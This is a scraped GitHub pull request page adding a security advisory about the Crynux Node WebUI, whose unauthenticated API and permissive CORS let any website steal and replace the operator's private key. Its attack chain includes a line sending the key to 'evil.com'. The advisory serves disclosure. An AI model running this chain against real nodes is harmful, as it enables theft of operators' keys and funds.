Add GHSA-5469-xxr8-3chv: Crynux Node Missing Authentication / Private Key Exposure (CRITICAL 9.8)#8811
Closed
senastor wants to merge 1 commit into
Closed
Conversation
github-actions
Bot
changed the base branch from
main
to
senastor/advisory-improvement-8811
July 25, 2026 00:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
New Advisory: Crynux Node — Missing Authentication + Permissive CORS Enables Remote Private Key Theft
Summary
The Crynux Node WebUI (FastAPI server on port 7412) has no authentication on any API endpoint and uses permissive CORS (
allow_origins=["*"]withallow_credentials=True). This allows any website to silently extract the node operator's private key and replace it with an attacker's key via cross-origin JavaScript.Severity
CRITICAL — CVSS 9.8 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)
Affected Package
Vulnerable Code
src/crynux_server/server/middleware.py— CORS allows any origin with credentials:src/crynux_server/server/v1/account.py— Returns private key in API response:Attack Chain (Browser CORS Drive-By)
POST http://localhost:7412/manager/v1/account(no auth, CORS allows)PUT http://localhost:7412/manager/v1/accountwith attacker's keynew Image().src = "https://evil.com/collect?key=..."Verified Endpoints (No Auth Required)
/manager/v1/system/manager/v1/account/manager/v1/account/manager/v1/account/manager/v1/node/manager/v1/tasksImpact
Public Disclosure
This vulnerability has been publicly disclosed via GitHub issue:
crynux-network/crynux-node#430
The repository does not have private vulnerability reporting enabled. The issue was filed publicly to ensure disclosure.
CWE
References